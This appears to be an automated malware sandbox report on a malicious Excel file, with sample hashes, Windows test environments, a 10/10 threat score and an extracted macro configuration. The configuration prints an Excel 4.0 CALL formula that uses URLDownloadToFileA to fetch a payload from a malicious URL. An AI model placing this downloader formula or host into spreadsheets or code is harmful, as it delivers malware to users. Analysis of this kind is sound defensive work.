General
Target: 5527146056155136.zip
Size: 11KB
Sample: 210308-k7xk81e2rs
MD5: bda336dfdf5f1db4824bbe1650f7b7cc
SHA1: 6767e6b4ea3f2df27fa645af10424e86b8ab4041
SHA256: bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0
SHA512: e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a
Behavioral task: behavioral1
Sample: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource: win7v20201028
Behavioral task: behavioral2
Sample: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource: win10v20201028
Malware Config
Extracted: http://xjw10whta03ytgdi.com/inda.xls
formulas: =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)
Targets
Target: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
Size: 39KB
MD5: 9ef3b3a010179316440db44abbd34e90
SHA1: a5419ce2f80ce760bdf4a7bddd65df4a8a917123
SHA256: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
SHA512: 89f2379072f6f049e3affa1858d745313a1a438cffe9d47489d55731f9004c921e5b0c44da0f2bbc1f9c49424e8cc4dac44cec65603c0fe059ff32a58298ee41
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.